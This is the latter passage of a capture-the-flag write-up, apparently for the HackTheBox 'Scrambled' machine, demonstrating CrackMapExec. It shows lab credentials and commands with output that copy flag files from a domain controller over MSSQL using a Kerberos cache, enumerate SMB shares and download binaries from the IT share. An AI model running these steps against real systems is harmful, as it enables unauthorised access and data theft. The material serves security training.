SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\MiscSvc:ScrambledEggs9900 ``` We got a new user: * User: MiscSvc * Password: ScrambledEggs9900 #### 12. Getting user flag.txt ``` crackmapexec mssql DC1.scrm.local --use-kcache --get-file 'c:\\users\\miscsvc\\desktop\\user.txt' /tmp/user.txt MSSQL dc1.scrm.local 1433 NONE [*] (name:) (domain:) MSSQL dc1.scrm.local 1433 NONE [+] \ from ccache (Pwn3d!) MSSQL dc1.scrm.local 1433 NONE [*] Copy c:\\users\\miscsvc\\desktop\\user.txt to /tmp/user.txt MSSQL dc1.scrm.local 1433 NONE [+] File c:\\users\\miscsvc\\desktop\\user.txt was transferred to /tmp/user.txt ``` #### 12.bis Getting the root flag using (unatended solution ???) ``` crackmapexec mssql DC1.scrm.local --use-kcache --get-file 'c:\\users\\administrator\\desktop\\root.txt' /tmp/root.txt MSSQL dc1.scrm.local 1433 NONE [*] (name:) (domain:) MSSQL dc1.scrm.local 1433 NONE [+] \ from ccache (Pwn3d!) MSSQL dc1.scrm.local 1433 NONE [*] Copy c:\\users\\administrator\\desktop\\root.txt to /tmp/root.txt MSSQL dc1.scrm.local 1433 NONE [+] File c:\\users\\administrator\\desktop\\root.txt was transferred to /tmp/root.txt cat /tmp/root.txt 936c171e740f3009a405919f03a05644 ``` We have the root flag but it seems it is not the end #### 13. Getting readable shares for user miscsvc ``` crackmapexec smb DC1.scrm.local -u MiscSvc -p ScrambledEggs9900 -d scrm.local -k --shares SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\MiscSvc:ScrambledEggs9900 SMB DC1.scrm.local 445 DC1.scrm.local [+] Enumerated shares SMB DC1.scrm.local 445 DC1.scrm.local Share Permissions Remark SMB DC1.scrm.local 445 DC1.scrm.local ----- ----------- ------ SMB DC1.scrm.local 445 DC1.scrm.local ADMIN$ Remote Admin SMB DC1.scrm.local 445 DC1.scrm.local C$ Default share SMB DC1.scrm.local 445 DC1.scrm.local HR SMB DC1.scrm.local 445 DC1.scrm.local IPC$ READ Remote IPC SMB DC1.scrm.local 445 DC1.scrm.local IT READ SMB DC1.scrm.local 445 DC1.scrm.local NETLOGON READ Logon server share SMB DC1.scrm.local 445 DC1.scrm.local Public READ SMB DC1.scrm.local 445 DC1.scrm.local Sales SMB DC1.scrm.local 445 DC1.scrm.local SYSVOL READ Logon server share ``` #### 14. List file inside IT share ``` ing module at /home/kali/cme-gitlab/cme/modules/masky.py: No module named 'masky' SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\MiscSvc:ScrambledEggs9900 SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] Started spidering plus with option: SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] DIR: ['netlogon', 'public', 'sysvol', 'ipc$'] SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] EXT: ['ico', 'lnk'] SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] SIZE: 51200 SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] OUTPUT: /tmp/cme_spider_plus ┌──(kali㉿kali)-[~/cme-gitlab] └─$ cat /tmp/cme_spider_plus/DC1.scrm.local.json { "IT": { "Apps/Sales Order Client/ScrambleClient.exe": { "atime_epoch": "2021-11-05 16:57:06", "ctime_epoch": "2021-11-05 16:47:10", "mtime_epoch": "2021-11-05 16:57:08", "size": "84.5 KB" }, "Apps/Sales Order Client/ScrambleLib.dll": { "atime_epoch": "2021-11-05 16:57:06", "ctime_epoch": "2021-11-05 16:47:10", "mtime_epoch": "2021-11-05 16:57:08", "size": "19 KB" } } } ``` #### 15. Getting the two files ``` crackmapexec smb DC1.scrm.local -u MiscSvc -p ScrambledEggs9900 -d scrm.local -k --get-file 'Apps/Sales Order Client/ScrambleClient.exe' /tmp/file.exe --share "IT" SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\MiscSvc:ScrambledEggs9900 SMB DC1.scrm.local 445 DC1.scrm.local [*] Copy Apps/Sales Order Client/ScrambleClient.exe to /tmp/file.exe SMB DC1.scrm.local 445 DC1.scrm.local [+] File Apps/Sales Order Client/ScrambleClient.exe was transferred to /tmp/file.exe crackmapexec smb DC1.scrm.local -u MiscSvc -p ScrambledEggs9900 -d scrm.local -k --get-file 'Apps/Sales Order Client/ScrambleLib.dll' /tmp/file.dll --share "IT" SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\MiscSvc:ScrambledEggs9900 SMB DC1.scrm.local 445 DC1.scrm.local [*] Copy Apps/Sales Order Client/ScrambleLib.dll to /tmp/file.dll SMB DC1.scrm.local 445 DC1.scrm.local [+] File Apps/Sales Order Client/ScrambleLib.dll was transferred to /tmp/file.dll ``` For the rest, follow https://0xdf.gitlab.io/2022/10/01/htb-scrambled-linux.html => part ScrambleClient Reverse ! That's all for me, I hope you learn a bit more about CrackMapExec, for latest news follow me on twitter => [@mpgn_x64](https://twitter.com/mpgn_x64) and follow [@0xdf_](https://twitter.com/0xdf_) for the HTB writeup :)